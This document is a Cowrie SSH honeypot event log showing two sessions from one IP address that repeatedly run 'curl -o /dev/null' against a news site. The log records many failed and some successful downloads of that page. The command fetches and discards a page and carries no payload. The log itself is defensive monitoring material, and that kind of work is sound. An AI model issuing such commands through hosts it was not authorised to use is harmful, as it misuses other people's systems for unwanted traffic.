{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:32:07.665289Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:07.666279Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:32:07.691371Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:07.692362Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:07.709490Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:07.711668Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:32:07.715386Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:07.716673Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:32:07.767859Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:07.769022Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:07.771159Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:32:07.775612Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:07.776307Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","shasum":"f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","sensor":"my-vps","timestamp":"2025-09-09T08:32:07.796188Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4 to var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:07.828063Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:07.829524Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","shasum":"f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","sensor":"my-vps","timestamp":"2025-09-09T08:32:07.832489Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4 to var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","shasum":"f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","sensor":"my-vps","timestamp":"2025-09-09T08:32:07.872974Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4 to var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","shasum":"f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","sensor":"my-vps","timestamp":"2025-09-09T08:32:07.881138Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4 to var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:07.890739Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:07.892145Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:32:07.915987Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:07.916954Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:32:07.920099Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:07.920991Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:07.956032Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:07.957609Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:32:07.986458Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:07.987551Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:32:07.990016Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:07.990821Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:08.025529Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:08.027569Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:32:08.052676Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:08.053962Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:32:08.056683Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:08.057638Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:32:08.109937Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:08.111225Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:32:08.115345Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:08.116313Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:08.118131Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:08.119506Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","shasum":"f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","sensor":"my-vps","timestamp":"2025-09-09T08:32:08.168708Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4 to var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:08.169589Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:32:08.172162Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:08.173143Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:08.175889Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:32:08.177846Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:08.178866Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:08.218525Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:32:08.231073Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:08.232206Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:32:08.235373Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:08.236035Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:32:08.280389Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:08.281380Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:32:08.283288Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:08.284159Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:32:08.339588Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:08.340973Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:32:08.344736Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:08.345705Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:32:08.400365Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:08.401567Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:32:08.405782Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:08.406795Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:08.411572Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","shasum":"f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","sensor":"my-vps","timestamp":"2025-09-09T08:32:08.439536Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4 to var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:08.444226Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:32:08.445689Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:08.446704Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:32:08.451789Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:08.452684Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:08.481468Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:08.482968Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:32:08.491636Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:08.492753Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:32:08.499560Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:08.500516Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:08.524483Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:08.525363Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:32:08.546394Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:08.547327Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:32:08.556487Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:08.557446Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:08.571212Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:08.572877Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:08.754353Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:08.756016Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","shasum":"f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","sensor":"my-vps","timestamp":"2025-09-09T08:32:08.808261Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4 to var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","shasum":"f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","sensor":"my-vps","timestamp":"2025-09-09T08:32:08.821873Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4 to var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","shasum":"f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","sensor":"my-vps","timestamp":"2025-09-09T08:32:08.867521Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4 to var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:32:08.912735Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:08.913897Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","shasum":"f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","sensor":"my-vps","timestamp":"2025-09-09T08:32:08.917674Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4 to var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:32:08.933505Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:08.934502Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","shasum":"f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","sensor":"my-vps","timestamp":"2025-09-09T08:32:08.995100Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4 to var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:32:09.021042Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:09.022677Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:32:09.064979Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:09.066255Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:09.128963Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:09.130570Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:32:09.170888Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:09.172005Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:09.186038Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
